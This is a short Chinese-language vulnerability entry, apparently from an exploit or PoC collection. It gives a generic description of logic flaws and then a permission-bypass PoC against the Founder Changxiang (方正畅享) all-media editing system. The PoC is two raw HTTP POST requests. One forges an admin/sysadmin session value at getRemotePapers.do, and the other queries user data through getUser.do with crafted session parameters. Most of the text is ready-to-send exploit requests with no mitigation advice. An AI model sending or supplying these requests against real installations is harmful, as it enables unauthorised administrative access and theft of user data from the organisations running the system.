漏洞描述
逻辑漏洞是指应用程序中存在的安全缺陷,它允许未经授权的用户通过非正常途径访问或操作系统资源,导致敏感信息泄露、数据篡改、服务中断等安全问题。这类漏洞通常是由于程序设计不当、权限控制不严、输入验证不足或业务逻辑错误引起的。
方正畅享全媒体采编系统 getRemotePapers 权限绕过漏洞
PoC代码
POST /newsedit/api/stub/getRemotePapers.do?siteCode=1 HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Session_SysUser=1%2C127.0.0.1%2C1%2C1%2C1%2Cadmin%2Csysadmin%2Clocalhost
POST /newsedit/newsedit/userSearch/getUser.do HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
UUID=adminUser&Session_ProcParam=a=1,a=0,a=1,a=1,a=-9999,a=sysadmin,a=0,a=admin,a=2024-06-11 11:11:11:000,a=1,a=1&DocIDs=1&DocLibID=1